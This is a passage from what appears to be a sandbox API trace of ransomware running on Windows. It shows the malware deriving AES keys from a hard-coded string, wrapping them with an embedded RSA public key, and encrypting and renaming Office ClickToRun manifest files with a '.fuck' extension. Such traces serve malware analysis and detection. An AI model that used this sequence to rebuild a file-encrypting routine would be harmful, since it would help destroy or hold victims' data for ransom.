users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.270] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.270] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.270] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.273] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.273] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.273] CryptHashData (hHash=0x2893af0, pbData=0x2884e68, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.273] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x2893af0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893fb0) returned 1 [0239.273] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.273] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.273] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28aa518) returned 1 [0239.274] CryptImportPublicKeyInfo (in: hCryptProv=0x28aa518, dwCertEncodingType=0x1, pInfo=0x2897fa0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2897fd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2897fd8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28948f0) returned 1 [0239.274] CryptEncrypt (in: hKey=0x28948f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.274] CryptEncrypt (in: hKey=0x28948f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28aa7c0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28aa7c0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.274] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28aa7c0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.274] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.274] CryptEncrypt (in: hKey=0x2893fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.274] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.274] CloseHandle (hObject=0xffffffff) returned 1 [0239.274] CloseHandle (hObject=0xffffffff) returned 1 [0239.274] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.275] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.275] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml.gsg")) returned 0 [0239.276] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml.fuck")) returned 0 [0239.277] CryptDestroyHash (hHash=0x2893af0) returned 1 [0239.277] CryptDestroyKey (hKey=0x2893fb0) returned 1 [0239.277] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.277] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.278] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.278] GetLastError () returned 0x5 [0239.278] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml")) returned 0x20 [0239.278] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.278] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.279] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.279] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.280] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ac1c8) returned 1 [0239.282] CryptCreateHash (in: hProv=0x28ac1c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.282] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.282] CryptHashData (hHash=0x2893af0, pbData=0x2884da0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.282] CryptDeriveKey (in: hProv=0x28ac1c8, Algid=0x6610, hBaseData=0x2893af0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893b70) returned 1 [0239.282] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.282] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.282] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ab6a0) returned 1 [0239.283] CryptImportPublicKeyInfo (in: hCryptProv=0x28ab6a0, dwCertEncodingType=0x1, pInfo=0x28975e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2897610*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2897618*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28945b0) returned 1 [0239.283] CryptEncrypt (in: hKey=0x28945b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.283] CryptEncrypt (in: hKey=0x28945b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28aba58*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28aba58*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.283] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28aba58, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.283] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.283] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.283] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.284] CloseHandle (hObject=0xffffffff) returned 1 [0239.284] CloseHandle (hObject=0xffffffff) returned 1 [0239.284] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.284] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.285] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml.gsg")) returned 0 [0239.285] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml.fuck")) returned 0 [0239.285] CryptDestroyHash (hHash=0x2893af0) returned 1 [0239.285] CryptDestroyKey (hKey=0x2893b70) returned 1 [0239.286] CryptReleaseContext (hProv=0x28ac1c8, dwFlags=0x0) returned 1 [0239.286] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.286] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.286] GetLastError () returned 0x5 [0239.286] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml")) returned 0x20 [0239.286] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.286] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.287] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.287] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.288] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.290] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.290] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.290] CryptHashData (hHash=0x2893fb0, pbData=0x276d810, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.290] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893af0) returned 1 [0239.290] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.290] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.291] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ac1c8) returned 1 [0239.291] CryptImportPublicKeyInfo (in: hCryptProv=0x28ac1c8, dwCertEncodingType=0x1, pInfo=0x2898070*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28980a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28980a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2894430) returned 1 [0239.291] CryptEncrypt (in: hKey=0x2894430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.291] CryptEncrypt (in: hKey=0x2894430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ab728*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ab728*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.291] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ab728, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.292] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.292] CryptEncrypt (in: hKey=0x2893af0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.292] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.292] CloseHandle (hObject=0xffffffff) returned 1 [0239.292] CloseHandle (hObject=0xffffffff) returned 1 [0239.292] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.292] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.293] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml.gsg")) returned 0 [0239.293] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml.fuck")) returned 0 [0239.294] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.294] CryptDestroyKey (hKey=0x2893af0) returned 1 [0239.294] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.294] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.294] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.295] GetLastError () returned 0x5 [0239.295] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml")) returned 0x20 [0239.295] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.296] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.296] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.296] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.297] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ac140) returned 1 [0239.299] CryptCreateHash (in: hProv=0x28ac140, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.300] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.300] CryptHashData (hHash=0x2893fb0, pbData=0x2857498, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.300] CryptDeriveKey (in: hProv=0x28ac140, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893b70) returned 1 [0239.300] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 